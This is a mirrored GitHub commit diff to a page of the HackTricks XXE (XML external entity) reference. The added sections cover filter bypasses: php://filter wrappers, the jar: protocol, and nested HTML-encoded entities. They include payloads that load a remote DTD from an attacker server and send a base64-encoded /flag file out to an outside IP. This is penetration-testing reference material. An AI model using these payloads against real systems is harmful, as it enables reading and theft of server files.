mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 23:51:29 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
34d41f57c9
commit
9d0d6ccbe4
1 changed files with 28 additions and 1 deletions
|
@ -465,7 +465,7 @@ Content-Type: application/xml;charset=UTF-8
|
|||
|
||||
Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
|
||||
|
||||
## Other bypasses
|
||||
## WAF & Protections Bypasses
|
||||
|
||||
### Base64
|
||||
|
||||
|
@ -491,6 +491,33 @@ You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github
|
|||
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
|
||||
```
|
||||
|
||||
### File:/ Protocol Bypass
|
||||
|
||||
If the web is using PHP, instead of using `file:/` you can use **php wrappers**`php://filter/convert.base64-encode/resource=` to **access internal files**.
|
||||
|
||||
If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol).
|
||||
|
||||
### HTML entities
|
||||
|
||||
Trick from [https://github.com/Ambrotd/XXE-Notes](https://github.com/Ambrotd/XXE-Notes)
|
||||
You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.
|
||||
|
||||
```markup
|
||||
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "<!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >" >%a;%dtd;]>
|
||||
<data>
|
||||
<env>&exfil;</env>
|
||||
</data>
|
||||
```
|
||||
|
||||
DTD example:
|
||||
|
||||
```markup
|
||||
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag">
|
||||
<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>">
|
||||
%abt;
|
||||
%exfil;
|
||||
```
|
||||
|
||||
## PHP Wrappers
|
||||
|
||||
### Base64
|
||||
|
|
Loading…
Reference in a new issue